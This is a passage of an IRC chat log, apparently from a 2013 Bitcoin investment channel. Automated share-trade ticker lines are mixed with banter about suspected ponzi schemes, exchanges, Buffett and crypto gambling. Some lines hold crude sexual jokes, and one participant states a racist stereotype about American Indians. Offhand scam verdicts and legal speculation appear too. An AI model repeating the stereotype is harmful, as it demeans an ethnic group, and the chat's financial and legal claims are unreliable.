[-] Aug 12 01:26:52 [BTCTC] [ACTIVEMINING] 7 @ 0.005494 = 0.0385 BTC [-] Aug 12 01:28:09 [BTCTC] [BTCGARDEN] 80 @ 0.0157 = 1.256 BTC [-] Aug 12 01:28:21 [MPEX] [S.MPOE] 12100 @ 0.00084725 = 10.2517 BTC [+] Aug 12 01:29:13 [BTCTC] [NASTY-PT] 32 @ 0.00401 = 0.1283 BTC [+] Aug 12 01:29:14 [BTCTC] [NASTY-PT] 55 @ 0.004037 = 0.222 BTC [+] Aug 12 01:29:16 [BTCTC] [NASTY-PT] 18 @ 0.00409 = 0.0736 BTC [+] Aug 12 01:37:58 [BTCTC] [TAT.ASICMINER] 1 @ 0.03867 BTC [+] Aug 12 01:42:10 [HAVELOCK] [SDSTM] 1 @ 0.005536 BTC [+] Aug 12 01:45:07 [BTCTC] [ACTIVEMINING] 22 @ 0.005506 = 0.1211 BTC [+] Aug 12 01:46:06 [BTCTC] [ACTIVEMINING] 22 @ 0.005506 = 0.1211 BTC [+] Aug 12 01:48:09 [BTCTC] [ACTIVEMINING] 22 @ 0.005506 = 0.1211 BTC [+] Aug 12 01:50:20 [BTCTC] [ACTIVEMINING] 22 @ 0.005506 = 0.1211 BTC [+] Aug 12 01:52:09 [BTCTC] [ACTIVEMINING] 22 @ 0.005506 = 0.1211 BTC [+] Aug 12 01:54:12 [BTCTC] [ACTIVEMINING] 22 @ 0.005506 = 0.1211 BTC [+] Aug 12 01:56:18 [BTCTC] [ACTIVEMINING] 22 @ 0.005506 = 0.1211 BTC [+] Aug 12 01:57:38 fuck, we can't have any private conversation https://bitcointalk.org/index.php?topic=271711.msg2913713#msg2913713 Aug 12 01:58:11 [BTCTC] [ACTIVEMINING] 22 @ 0.005506 = 0.1211 BTC [+] Aug 12 01:58:22 TradeFartress: nice nickname Aug 12 01:58:36 thanx pankkake Aug 12 02:00:21 [BTCTC] [ACTIVEMINING] 22 @ 0.005506 = 0.1211 BTC [+] Aug 12 02:00:24 haha MOAR sex-slaves Aug 12 02:01:32 at least the word does not know my dick size Aug 12 02:01:40 true Aug 12 02:02:11 [BTCTC] [ACTIVEMINING] 22 @ 0.005506 = 0.1211 BTC [+] Aug 12 02:04:10 [BTCTC] [ACTIVEMINING] 22 @ 0.005506 = 0.1211 BTC [+] Aug 12 02:06:11 [BTCTC] [ACTIVEMINING] 22 @ 0.005506 = 0.1211 BTC [+] Aug 12 02:06:26 pankkake huh ? Aug 12 02:06:35 lmao Aug 12 02:07:04 jesus that thing;s a hit. Aug 12 02:08:08 [BTCTC] [ACTIVEMINING] 86 @ 0.005506 = 0.4735 BTC [+] Aug 12 02:09:21 any idea when BTC-GROWTH fund will start selling shares? Aug 12 02:09:23 please flog her for me Aug 12 02:09:39 is it a penis enlargment company? Aug 12 02:10:35 if someone is selling penis-enlargment shares I am definitely buying in. Aug 12 02:10:44 no, but I can give you some good deals on those Aug 12 02:11:36 Meh I got all my money in coinlenders Aug 12 02:11:52 loanshark Aug 12 02:12:49 It's not loansharking lelel Aug 12 02:13:15 today we were wondering, as coinlenders is likely a ponzi, is inputs.io a way to make the ponzi live a bit longer? Aug 12 02:13:20 Important Notice: CoinLenders is not a bank or financial institution. This is not an investment, and CoinLenders does not solicit investments from anyone. CoinLenders is a fictional website operating for web development, entertainment and educational purposes only. Aug 12 02:13:26 pankkake is it ? Aug 12 02:13:39 [BTCTC] [LABCOIN] 20 @ 0.001363 = 0.0273 BTC [-] Aug 12 02:13:43 does coinlenders have a debt collector agency? Aug 12 02:14:18 [BTCTC] [BTCGARDEN] 1 @ 0.01594 BTC [+] Aug 12 02:14:40 [BTCTC] [DMS.MINING] 4 @ 0.0036 = 0.0144 BTC [+] Aug 12 02:14:41 I dunno. TBH I would never use them Aug 12 02:15:05 otherwise these guys seem like a good choice: http://www.vice.com/en_uk/rule-britannia/the-debt-collector-part-1 Aug 12 02:15:29 mircea, I would like to praise you for being the only exchange to not list 100mil worth of bullshit this month Aug 12 02:16:11 It is a sad state of affairs right now on everything but MPEX Aug 12 02:17:02 well hopefully people are working on some foundations for bitcoin instead of just grabbing a smaller piece of the mining pie Aug 12 02:17:08 Its a nightmare finding anyone trustworthy to trade with anymore Aug 12 02:17:50 remember the Internet 15-20 years ago? Aug 12 02:18:23 mostly intelligent and honest people Aug 12 02:18:46 Hollywood it's not so hard to do. Aug 12 02:19:03 well hopefully people are working on some foundations for bitcoin instead of just grabbing a smaller piece of the mining pie << lol! Aug 12 02:19:07 how little do you know :D Aug 12 02:19:46 well, you are not taking the easy way and that is to be commended Aug 12 02:19:56 more than you might expect, but I'm not starting a pissing contest Aug 12 02:20:06 Anyone know anything about these guys? http://coinjar.io/ Aug 12 02:21:03 Hollywood why ty. Aug 12 02:21:10 Omen1855: hopefully Aug 12 02:21:31 Omen1855 i'm just sayin', the girl's been quoting buffett's sad story of textiles to these people for months. Aug 12 02:21:41 about as much effect as if she had read it to goats. Aug 12 02:21:49 which i guess isn't that far off... Aug 12 02:22:12 yeah guess I'm not the only one bothered by the state of affairs Aug 12 02:22:22 mining is still "free money" in the eyes of many Aug 12 02:22:55 I'm not investing anymore, I can't compete anymore Aug 12 02:22:57 well the problem is many have this extensive life experience gleaned on reddit Aug 12 02:23:03 [BTCTC] [TAT.ASICMINER] 67 @ 0.03818 = 2.5581 BTC [-] Aug 12 02:23:05 so ... well... stuff. and things. Aug 12 02:23:12 Investing makes more sense if you want the currency to actually do something Aug 12 02:23:35 TradeFartress true. tho there's something to be said for merely not feeding the scammers. Aug 12 02:23:46 [BTCTC] [DMS.SELLING] 4 @ 0.0245 = 0.098 BTC [+] Aug 12 02:24:04 I use coinjar.io Aug 12 02:24:05 mircea_popescu: That is true. I never feed one if I can help it Aug 12 02:24:14 I meant investing in mining equipment or stock Aug 12 02:24:19 i'm kinda surprised that thread is still in bitcoin discussion tbh. Aug 12 02:24:25 i guess the mods phear the girl. Aug 12 02:24:47 ArcticWolf what's it do anyway ? some sort of online wallet ? Aug 12 02:24:57 i just use it to buy btc Aug 12 02:25:07 Yes i was looking into them today. Aug 12 02:25:18 you can buy at 2% above the day average of gox Aug 12 02:25:30 that's quite reasonable Aug 12 02:26:56 [BTCTC] [DMS.MINING] 25 @ 0.003599 = 0.09 BTC [-] Aug 12 02:27:54 [BTCTC] [DMS.MINING] 46 @ 0.0036 = 0.1656 BTC [+] Aug 12 02:28:40 I may give coinjar a shot anyway. Who knows? Aug 12 02:28:45 only Australia is supported to buy coins Aug 12 02:28:48 ? Aug 12 02:30:34 really? Aug 12 02:30:53 Maybe Ill have Tradefortress get me some Aug 12 02:31:02 * Country Aug 12 02:31:03 For now, only Australia is supported. Aug 12 02:31:24 is that for sale only or buying as well? Aug 12 02:31:44 no I think you can deposit your coins Aug 12 02:31:52 and sell them for aussie dollars Aug 12 02:33:16 trouble there BTCOxygen ? Aug 12 02:38:16 anyone experience with bitfinex? Aug 12 02:38:18 [HAVELOCK] [XBOND] 13 @ 0.0010461 = 0.0136 BTC [+] Aug 12 02:40:28 [HAVELOCK] [AM100] 3 @ 0.036 = 0.108 BTC [+] Aug 12 02:45:01 [BTCTC] [BTCGARDEN] 16 @ 0.01594 = 0.255 BTC [+] Aug 12 02:45:02 [BTCTC] [BTCGARDEN] 62 @ 0.01595 = 0.9889 BTC [+] Aug 12 02:47:52 [BTCTC] [TAT.ASICMINER] 50 @ 0.03876 = 1.938 BTC [+] Aug 12 02:50:06 [BTCTC] [LABCOIN] 30 @ 0.001348 = 0.0404 BTC [-] Aug 12 02:50:08 [BTCTC] [LABCOIN] 50 @ 0.001347 = 0.0674 BTC [-] Aug 12 02:50:09 [BTCTC] [LABCOIN] 150 @ 0.001345 = 0.2018 BTC [-] Aug 12 02:50:10 [BTCTC] [LABCOIN] 440 @ 0.001344 = 0.5914 BTC [-] Aug 12 02:50:11 [BTCTC] [LABCOIN] 330 @ 0.001335 = 0.4406 BTC [-] Aug 12 02:52:29 [BTCTC] [ACTIVEMINING] 30 @ 0.005417 = 0.1625 BTC [-] Aug 12 02:52:31 [BTCTC] [ACTIVEMINING] 68 @ 0.005416 = 0.3683 BTC [-] Aug 12 02:52:32 [BTCTC] [ACTIVEMINING] 20 @ 0.005283 = 0.1057 BTC [-] Aug 12 02:52:33 [BTCTC] [ACTIVEMINING] 100 @ 0.005282 = 0.5282 BTC [-] Aug 12 02:52:34 [BTCTC] [ACTIVEMINING] 2 @ 0.005247 = 0.0105 BTC [-] Aug 12 02:52:36 [BTCTC] [ACTIVEMINING] 13 @ 0.005246 = 0.0682 BTC [-] Aug 12 02:52:37 [BTCTC] [ACTIVEMINING] 31 @ 0.005201 = 0.1612 BTC [-] Aug 12 02:52:38 [BTCTC] [ACTIVEMINING] 155 @ 0.0052 = 0.806 BTC [-] Aug 12 02:52:39 [BTCTC] [ACTIVEMINING] 60 @ 0.005184 = 0.311 BTC [-] Aug 12 02:52:40 [BTCTC] [ACTIVEMINING] 300 @ 0.005183 = 1.5549 BTC [-] Aug 12 02:52:41 [BTCTC] [ACTIVEMINING] 23 @ 0.005166 = 0.1188 BTC [-] Aug 12 02:52:41 [BTCTC] [ACTIVEMINING] 118 @ 0.005165 = 0.6095 BTC [-] Aug 12 02:52:42 [BTCTC] [ACTIVEMINING] 85 @ 0.005161 = 0.4387 BTC [-] Aug 12 02:52:43 [BTCTC] [ACTIVEMINING] 347 @ 0.005161 = 1.7909 BTC [-] Aug 12 02:52:44 [BTCTC] [ACTIVEMINING] 89 @ 0.00516 = 0.4592 BTC [-] Aug 12 02:52:46 [BTCTC] [ACTIVEMINING] 160 @ 0.00516 = 0.8256 BTC [-] Aug 12 02:52:47 [BTCTC] [ACTIVEMINING] 400 @ 0.00516 = 2.064 BTC [-] Aug 12 02:52:48 [BTCTC] [ACTIVEMINING] 138 @ 0.005159 = 0.7119 BTC [-] Aug 12 02:52:49 [BTCTC] [ACTIVEMINING] 79 @ 0.005158 = 0.4075 BTC [-] Aug 12 02:52:50 [BTCTC] [ACTIVEMINING] 370 @ 0.005156 = 1.9077 BTC [-] Aug 12 02:52:51 [BTCTC] [ACTIVEMINING] 500 @ 0.005156 = 2.578 BTC [-] Aug 12 02:52:52 [BTCTC] [ACTIVEMINING] 499 @ 0.005143 = 2.5664 BTC [-] Aug 12 02:52:53 [BTCTC] [ACTIVEMINING] 1746 @ 0.005142 = 8.9779 BTC [-] Aug 12 02:52:53 [BTCTC] [ACTIVEMINING] 367 @ 0.00514 = 1.8864 BTC [-] Aug 12 02:53:38 [BTCTC] [LABCOIN] 10 @ 0.001344 = 0.0134 BTC [+] Aug 12 02:58:27 Omen1855 it's a scam. Aug 12 03:00:06 [BTCTC] [MININGCO.ETF] 1 @ 0.82 BTC [-] Aug 12 03:05:06 mp, it has the looks of it, but seems to be running for a while now Aug 12 03:06:12 [BTCTC] [DMS.PURCHASE] 100 @ 0.02806 = 2.806 BTC [-] Aug 12 03:07:43 [BTCTC] [BITVPS] 3 @ 0.002203 = 0.0066 BTC [-] Aug 12 03:09:20 !last btctc dms.selling Aug 12 03:09:21 Last trade for DMS.SELLING on BTCTC was at 0.0245 BTC [+] Aug 12 03:09:40 [BTCTC] [TAT.ASICMINER] 8 @ 0.03819 = 0.3055 BTC [-] Aug 12 03:10:07 [BTCTC] [BTCGARDEN] 17 @ 0.01594 = 0.271 BTC [-] Aug 12 03:10:27 [BTCTC] [TAT.ASICMINER] 17 @ 0.03818 = 0.6491 BTC [-] Aug 12 03:10:30 [BTCTC] [BTCGARDEN] 1 @ 0.01593 BTC [-] Aug 12 03:10:31 [BTCTC] [BTCGARDEN] 10 @ 0.01594 = 0.1594 BTC [+] Aug 12 03:10:34 mircea_popescu: i'm just sayin', the girl's been quoting Aug 12 03:10:34 buffett's sad story of textiles to these people for Aug 12 03:10:37 months. Aug 12 03:10:53 ^^ I thought you didn't like using buffet as an example Aug 12 03:11:23 [BTCTC] [BTCGARDEN] 16 @ 0.01594 = 0.255 BTC [+] Aug 12 03:11:25 [BTCTC] [BTCGARDEN] 1 @ 0.01595 BTC [+] Aug 12 03:11:42 [BTCTC] [DMS.SELLING] 1 @ 0.0236 BTC [-] Aug 12 03:11:55 [BTCTC] [BTCGARDEN] 16 @ 0.01595 = 0.2552 BTC [+] Aug 12 03:12:37 [BTCTC] [BTCGARDEN] 5 @ 0.01595 = 0.0798 BTC [+] Aug 12 03:13:00 latter day buffett is a scandal. 1970s buffett is pretty good. Aug 12 03:13:08 [BTCTC] [BTCGARDEN] 50 @ 0.01596 = 0.798 BTC [+] Aug 12 03:13:20 Omen1855 you've missed the thread where they split up ? Aug 12 03:14:13 yup, but I had something in back of my mind there was something up with them Aug 12 03:15:14 [BTCTC] [LABCOIN] 501 @ 0.001369 = 0.6859 BTC [+] Aug 12 03:15:42 what about latter day buffet is scandalous? Aug 12 03:16:05 [BTCTC] [LABCOIN] 10 @ 0.00137 = 0.0137 BTC [+] Aug 12 03:16:06 [BTCTC] [LABCOIN] 290 @ 0.00137 = 0.3973 BTC [+] Aug 12 03:16:28 [BTCTC] [DMS.SELLING] 4 @ 0.0236 = 0.0944 BTC [-] Aug 12 03:16:29 thestringpuller let's see. he claiming that the taxes are too low as proven by what he pays in tax. except he doesn't pay himself a salary. Aug 12 03:16:43 and doesn't everyone know the textile story of Buffet, he buys a dying company out of spite, turns it into a different business /w insurance, etc. etc. Aug 12 03:16:50 he donating money to the gates foundation of evil Aug 12 03:16:52 etc Aug 12 03:17:00 and no, that's not the story at all. Aug 12 03:17:09 Omen1855 https://bitcointalk.org/index.php?topic=224745.0 Aug 12 03:17:21 [BTCTC] [LABCOIN] 30 @ 0.001368 = 0.041 BTC [-] Aug 12 03:17:36 oh yeah I read that one Aug 12 03:17:58 now the bell rings Aug 12 03:18:21 that's where I got this nasty feeling from Aug 12 03:18:25 In 1962, Warren Buffett began buying stock in Berkshire Hathaway after noticing a pattern in the price direction of its stock whenever the company closed a mill. Eventually, Buffett acknowledged that the textile business was waning and the company's financial situation was not going to improve. In 1964, Stanton made an oral tender offer of $111.2 per share for the company to buy back Buffett's shares. Buffett agreed to the deal. A few weeks lat Aug 12 03:18:32 Buffett initially maintained Berkshire's core business of textiles, but by 1967, he was expanding into the insurance industry and other investments. Aug 12 03:18:42 not that part. the girl has a quote Aug 12 03:19:49 where is da quote? Aug 12 03:20:24 [BTCTC] [NASTY-PT] 1 @ 0.00408 BTC [-] Aug 12 03:20:29 https://bitcointalk.org/index.php?topic=201268.msg2121475#msg2121475 Aug 12 03:20:54 [BTCTC] [LABCOIN] 1 @ 0.001368 BTC [-] Aug 12 03:22:11 [BTCTC] [NASTY-PT] 18 @ 0.00409 = 0.0736 BTC [+] Aug 12 03:22:24 [HAVELOCK] [XBOND] 362 @ 0.0010461 = 0.3787 BTC [+] Aug 12 03:22:27 alright..who owns #bitcoin-ass Aug 12 03:22:36 wtf people Aug 12 03:22:47 i thought you did ? Aug 12 03:23:39 damnit..no i think someone registered it Aug 12 03:23:44 >chanserv< info #bitcoin-ass Aug 12 03:24:12 is there a btc/sextoy market yet..i should probably ask in marketplac Aug 12 03:24:27 there were some shops trying to get off the ground Aug 12 03:24:32 but the btc consumer market is a joek. Aug 12 03:25:22 -ChanServ- Information on #bitcoin-ass: Aug 12 03:25:22 -ChanServ- Founder : KRS-1 Aug 12 03:25:27 dude. you own it lmao Aug 12 03:25:33 o snap Aug 12 03:26:05 i played blackjack with this guy once..idk how the topic came up but he said something like "I'm responsible for about 30% of rubber dicks in the southeast region of the U.S." Aug 12 03:26:06 fucking noobs on irc!!1 Aug 12 03:26:13 I was like :O Aug 12 03:26:17 [BTCTC] [ACTIVEMINING] 30 @ 0.005256 = 0.1577 BTC [+] Aug 12 03:26:37 I'm not a noob I was on IRC since 1995..but on and off. Aug 12 03:26:52 !!11 Aug 12 03:26:56 i used to fuck with eggdrop bots and stuff Aug 12 03:27:09 anyway, i can sorta imagine how it came up. you were mangrinding right ? Aug 12 03:27:31 [BTCTC] [ACTIVEMINING] 20 @ 0.005261 = 0.1052 BTC [+] Aug 12 03:27:31 haha i was just playing blackjack but almost lost my beer when he said that Aug 12 03:27:38 mangrinding lol wtf Aug 12 03:28:21 is there any serious investment in btc/online poker/casino? Aug 12 03:28:39 sort-of Aug 12 03:28:51 i would think that should be worth while since there would be no regulation.idk Aug 12 03:29:09 someone should jump on that Aug 12 03:36:52 wordpress got like 50 bux in purchase from bitcoiners over a year. Aug 12 03:37:03 there is no way offering any consumer anything in btc is worthwhile Aug 12 03:37:22 Next->Next->Next->Finished. Aug 12 03:38:02 [BTCTC] [TAT.ASICMINER] 4 @ 0.03863 = 0.1545 BTC [+] Aug 12 03:38:11 well the way i figure it is online gambling for fiat causes many headaches in the U.S. If its BTC wouldnt our government not give a shit since its fake money? Aug 12 03:38:40 yes, the usa does not care about bitcoin because it is fake money Aug 12 03:38:49 the azn gambling market is where it's at i'm sure. Aug 12 03:38:51 wait, hold on Aug 12 03:40:04 idk about the azn's but i do know that American Indians are drunk gambling degenerates..theres a huge market for them here. Aug 12 03:41:44 [BTCTC] [BMF] 5 @ 0.03483 = 0.1742 BTC [-] Aug 12 03:42:21 [BTCTC] [TAT.VIRTUALMINE] 32 @ 0.001296 = 0.0415 BTC [-] Aug 12 03:44:34 [BTCTC] [DMS.SELLING] 10 @ 0.02425 = 0.2425 BTC [+] Aug 12 03:44:44 [HAVELOCK] [XBOND] 200 @ 0.0010465 = 0.2093 BTC [+] Aug 12 03:45:06 [HAVELOCK] [XBOND] 2 @ 0.0010465 = 0.0021 BTC [+] Aug 12 03:45:08 [HAVELOCK] [XBOND] 17 @ 0.00104655 = 0.0178 BTC [+] Aug 12 03:45:11 [HAVELOCK] [XBOND] 481 @ 0.001047 = 0.5036 BTC [+] Aug 12 03:45:29 [HAVELOCK] [XBOND] 1500 @ 0.001047 = 1.5705 BTC [+] Aug 12 03:46:27 [BTCTC] [TAT.MINIGAME] 2 @ 0.0002062 = 0.0004 BTC [-] Aug 12 03:46:33 [HAVELOCK] [XBOND] 2000 @ 0.001047 = 2.094 BTC [+] Aug 12 03:47:26 [HAVELOCK] [SMG] 2 @ 0.000199 = 0.0004 BTC [-] Aug 12 03:48:31 [BTCTC] [DMS.SELLING] 1 @ 0.02365 BTC [-] Aug 12 03:50:14 [BTCTC] [COGNITIVE] 1 @ 0.36 BTC [+] Aug 12 03:50:35 [BTCTC] [LABCOIN] 19 @ 0.001344 = 0.0255 BTC [-] Aug 12 03:50:48 [BTCTC] [ACTIVEMINING] 68 @ 0.00531 = 0.3611 BTC [+] Aug 12 03:50:49 [BTCTC] [ACTIVEMINING] 29 @ 0.005311 = 0.154 BTC [+] Aug 12 03:50:51 [BTCTC] [ACTIVEMINING] 30 @ 0.005311 = 0.1593 BTC [+] Aug 12 03:50:52 [BTCTC] [ACTIVEMINING] 50 @ 0.005313 = 0.2657 BTC [+] Aug 12 03:51:48 they have their own casinos, they gamble there Aug 12 03:54:12 [BTCTC] [BTCGARDEN] 25 @ 0.01572 = 0.393 BTC [-] Aug 12 03:55:40 [BTCTC] [DMS.MINING] 20 @ 0.003451 = 0.069 BTC [-] Aug 12 03:56:52 [BTCTC] [DMS.MINING] 41 @ 0.00345 = 0.1415 BTC [-] Aug 12 03:57:23 [HAVELOCK] [SMG] 10 @ 0.000199 = 0.002 BTC [-] Aug 12 03:57:46 [HAVELOCK] [SMG] 30 @ 0.000199 = 0.006 BTC [-] Aug 12 03:58:00 [HAVELOCK] [SMG] 819 @ 0.0001981 = 0.1622 BTC [-] Aug 12 03:58:14 [BTCTC] [DMS.MINING] 49 @ 0.003413 = 0.1672 BTC [-] Aug 12 04:01:14 [BTCTC] [DMS.MINING] 21 @ 0.003413 = 0.0717 BTC [-] Aug 12 04:01:16 [BTCTC] [BTCGARDEN] 115 @ 0.01571 = 1.8067 BTC [-] Aug 12 04:02:07 [BTCTC] [BASIC-MINING] 1 @ 0.3078 BTC [-] Aug 12 04:02:16 [BTCTC] [ACTIVEMINING] 39 @ 0.005456 = 0.2128 BTC [+] Aug 12 04:02:18 [BTCTC] [BTCGARDEN] 11 @ 0.0157 = 0.1727 BTC [-] Aug 12 04:04:12 [BTCTC] [BTCGARDEN] 21 @ 0.0157 = 0.3297 BTC [-] Aug 12 04:06:09 [BTCTC] [ASICMINER-PT] 1 @ 3.82 BTC [+] Aug 12 04:06:26 [BTCTC] [BTCGARDEN] 11 @ 0.0157 = 0.1727 BTC [-] Aug 12 04:07:39 [BTCTC] [DMS.SELLING] 10 @ 0.0245 = 0.245 BTC [+] Aug 12 04:10:01 [BTCTC] [DMS.SELLING] 30 @ 0.0245 = 0.735 BTC [+] Aug 12 04:10:04 assbot is a troll Aug 12 04:10:17 give me muh xbond Aug 12 04:12:19 [BTCTC] [DMS.PURCHASE] 2 @ 0.02806 = 0.0561 BTC [-] Aug 12 04:15:01 [BTCTC] [PAJKA.BOND] 6 @ 0.01589 = 0.0953 BTC [-] Aug 12 04:15:26 [BTCTC] [DMS.SELLING] 2 @ 0.0245 = 0.049 BTC [+] Aug 12 04:16:19 [BTCTC] [B.YABMC] 34 @ 0.00288 = 0.0979 BTC [-] Aug 12 04:17:23 [BTCTC] [DMS.MINING] 20 @ 0.00358 = 0.0716 BTC [+] Aug 12 04:19:20 [BTCTC] [TAT.VIRTUALMINE] 67 @ 0.001489 = 0.0998 BTC [+] Aug 12 04:25:10 [HAVELOCK] [SMG] 790 @ 0.0002007 = 0.1586 BTC [+] Aug 12 04:26:23 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001499 BTC [+] Aug 12 04:26:24 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0015 BTC [+] Aug 12 04:26:26 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00153 BTC [+] Aug 12 04:26:27 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00162 BTC [+] Aug 12 04:26:28 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001632 BTC [+] Aug 12 04:26:29 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001698 BTC [+] Aug 12 04:27:50 [HAVELOCK] [SMG] 800 @ 0.0001981 = 0.1585 BTC [-] Aug 12 04:28:18 [BTCTC] [DMS.MINING] 8 @ 0.00358 = 0.0286 BTC [+] Aug 12 04:28:20 [HAVELOCK] [SMG] 51 @ 0.0001981 = 0.0101 BTC [-] Aug 12 04:36:17 [BTCTC] [BTCGARDEN] 30 @ 0.0157 = 0.471 BTC [-] Aug 12 04:38:14 [BTCTC] [BTCGARDEN] 30 @ 0.0157 = 0.471 BTC [-] Aug 12 04:39:50 [BTCTC] [BTCGARDEN] 350 @ 0.01571 = 5.4985 BTC [+] Aug 12 04:40:12 [BTCTC] [BTCGARDEN] 8 @ 0.0157 = 0.1256 BTC [-] Aug 12 04:42:18 [BTCTC] [BTCGARDEN] 8 @ 0.0157 = 0.1256 BTC [-] Aug 12 04:44:22 [BTCTC] [BTCGARDEN] 8 @ 0.0157 = 0.1256 BTC [-] Aug 12 04:46:16 [BTCTC] [BTCGARDEN] 8 @ 0.0157 = 0.1256 BTC [-] Aug 12 04:47:14 [BTCTC] [DMS.SELLING] 5 @ 0.02487 = 0.1244 BTC [+] Aug 12 04:47:26 [BTCTC] [NASTY-PT] 2 @ 0.003703 = 0.0074 BTC [-] Aug 12 04:47:28 [BTCTC] [NASTY-PT] 2 @ 0.003702 = 0.0074 BTC [-] Aug 12 04:48:16 [BTCTC] [BTCGARDEN] 8 @ 0.0157 = 0.1256 BTC [-] Aug 12 04:48:35 [BTCTC] [DMS.MINING] 4 @ 0.0036 = 0.0144 BTC [+] Aug 12 04:50:13 [BTCTC] [BTCGARDEN] 8 @ 0.0157 = 0.1256 BTC [-] Aug 12 04:51:10 [BTCTC] [LABCOIN] 3 @ 0.00136 = 0.0041 BTC [+] Aug 12 04:52:15 [BTCTC] [BTCGARDEN] 8 @ 0.0157 = 0.1256 BTC [-] Aug 12 04:52:24 [HAVELOCK] [XBOND] 5513 @ 0.001047 = 5.7721 BTC [+] Aug 12 04:53:49 [BTCTC] [BASIC-MINING] 2 @ 0.3 = 0.6 BTC [-] Aug 12 04:54:18 [BTCTC] [BTCGARDEN] 8 @ 0.0157 = 0.1256 BTC [-] Aug 12 04:56:16 [BTCTC] [BTCGARDEN] 8 @ 0.0157 = 0.1256 BTC [-] Aug 12 04:58:14 [BTCTC] [BTCGARDEN] 4 @ 0.0157 = 0.0628 BTC [-] Aug 12 05:01:26 [BTCTC] [LABCOIN] 30 @ 0.001363 = 0.0409 BTC [+] Aug 12 05:01:27 [BTCTC] [LABCOIN] 3 @ 0.001364 = 0.0041 BTC [+] Aug 12 05:01:28 [BTCTC] [LABCOIN] 25 @ 0.001365 = 0.0341 BTC [+] Aug 12 05:01:29 [BTCTC] [LABCOIN] 427 @ 0.001369 = 0.5846 BTC [+] Aug 12 05:02:32 [BTCTC] [BTCGARDEN] 8 @ 0.0157 = 0.1256 BTC [-] Aug 12 05:02:33 [BTCTC] [BTCGARDEN] 135 @ 0.01571 = 2.1209 BTC [+] Aug 12 05:02:34 [BTCTC] [BTCGARDEN] 11 @ 0.01595 = 0.1755 BTC [+] Aug 12 05:02:36 [BTCTC] [BTCGARDEN] 33 @ 0.01596 = 0.5267 BTC [+] Aug 12 05:02:37 [BTCTC] [BTCGARDEN] 78 @ 0.01597 = 1.2457 BTC [+] Aug 12 05:02:38 [BTCTC] [BTCGARDEN] 16 @ 0.01597 = 0.2555 BTC [+] Aug 12 05:04:10 [BTCTC] [ASICMINER-PT] 1 @ 3.821 BTC [+] Aug 12 05:04:11 [BTCTC] [ASICMINER-PT] 3 @ 3.82 = 11.46 BTC [-] Aug 12 05:04:24 [BTCTC] [BTCGARDEN] 16 @ 0.01597 = 0.2555 BTC [+] Aug 12 05:05:26 [BTCTC] [BTCGARDEN] 15 @ 0.01598 = 0.2397 BTC [+] Aug 12 05:05:53 [HAVELOCK] [XBOND] 9 @ 0.001047 = 0.0094 BTC [+] Aug 12 05:06:15 !ticker Aug 12 05:06:15 Hell, ain't we about more fucked than a whore at closin' time, huh? Aug 12 05:06:17 [HAVELOCK] [XBOND] 1 @ 0.001047 BTC [+] Aug 12 05:06:19 ;;ticker Aug 12 05:06:19 MtGox BTCUSD ticker | Best bid: 105.00002, Best ask: 105.15259, Bid-ask spread: 0.15257, Last trade: 105.00002, 24 hour volume: 7311.75485538, 24 hour low: 102.70000, 24 hour high: 105.35000, 24 hour vwap: 104.38450 Aug 12 05:09:00 [BTCTC] [BTCGARDEN] 3 @ 0.01596 = 0.0479 BTC [-] Aug 12 05:09:39 [BTCTC] [TAT.MINIGAME] 28 @ 0.000239 = 0.0067 BTC [+] Aug 12 05:11:01 [HAVELOCK] [AM100] 1 @ 0.036 BTC [+] Aug 12 05:16:36 [BTCTC] [TAT.ASICMINER] 1 @ 0.0382 BTC [-] Aug 12 05:16:38 [BTCTC] [TAT.ASICMINER] 116 @ 0.03818 = 4.4289 BTC [-] Aug 12 05:16:39 [BTCTC] [TAT.ASICMINER] 23 @ 0.03818 = 0.8781 BTC [-] Aug 12 05:17:13 [BTCTC] [TAT.ASICMINER] 67 @ 0.03722 = 2.4937 BTC [-] Aug 12 05:19:04 hi all Aug 12 05:20:20 [BTCTC] [LABCOIN] 30 @ 0.001347 = 0.0404 BTC [-] Aug 12 05:20:22 [BTCTC] [LABCOIN] 50 @ 0.001346 = 0.0673 BTC [-] Aug 12 05:20:22 [BTCTC] [LABCOIN] 131 @ 0.001344 = 0.1761 BTC [-] Aug 12 05:20:23 [BTCTC] [LABCOIN] 50 @ 0.001343 = 0.0672 BTC [-] Aug 12 05:20:25 [BTCTC] [LABCOIN] 987 @ 0.001335 = 1.3176 BTC [-] Aug 12 05:20:26 [BTCTC] [LABCOIN] 800 @ 0.001325 = 1.06 BTC [-] Aug 12 05:20:27 [BTCTC] [LABCOIN] 1 @ 0.001321 BTC [-] Aug 12 05:20:28 [BTCTC] [LABCOIN] 5 @ 0.00132 = 0.0066 BTC [-] Aug 12 05:20:29 [BTCTC] [LABCOIN] 16 @ 0.001319 = 0.0211 BTC [-] Aug 12 05:20:30 [BTCTC] [LABCOIN] 30 @ 0.001318 = 0.0395 BTC [-] Aug 12 05:20:31 [BTCTC] [LABCOIN] 1 @ 0.001317 BTC [-] Aug 12 05:20:33 [BTCTC] [LABCOIN] 1000 @ 0.001317 = 1.317 BTC [-] Aug 12 05:20:34 [BTCTC] [LABCOIN] 900 @ 0.001317 = 1.1853 BTC [-] Aug 12 05:20:34 [BTCTC] [LABCOIN] 5000 @ 0.001316 = 6.58 BTC [-] Aug 12 05:20:35 [BTCTC] [LABCOIN] 700 @ 0.001315 = 0.9205 BTC [-] Aug 12 05:20:36 [BTCTC] [LABCOIN] 1500 @ 0.001315 = 1.9725 BTC [-] Aug 12 05:20:38 [BTCTC] [LABCOIN] 30 @ 0.001315 = 0.0395 BTC [-] Aug 12 05:21:21 [BTCTC] [ACTIVEMINING] 4 @ 0.005331 = 0.0213 BTC [-] Aug 12 05:21:23 [BTCTC] [ACTIVEMINING] 1707 @ 0.005484 = 9.3612 BTC [+] Aug 12 05:21:24 [BTCTC] [ACTIVEMINING] 341 @ 0.005485 = 1.8704 BTC [+] Aug 12 05:21:25 [BTCTC] [ACTIVEMINING] 200 @ 0.005499 = 1.0998 BTC [+] Aug 12 05:21:26 [BTCTC] [ACTIVEMINING] 248 @ 0.0055 = 1.364 BTC [+] Aug 12 05:21:50 [BTCTC] [ACTIVEMINING] 50 @ 0.005499 = 0.275 BTC [-] Aug 12 05:21:50 [BTCTC] [ACTIVEMINING] 120 @ 0.0055 = 0.66 BTC [+] Aug 12 05:22:02 question - did 14.5mn shares of 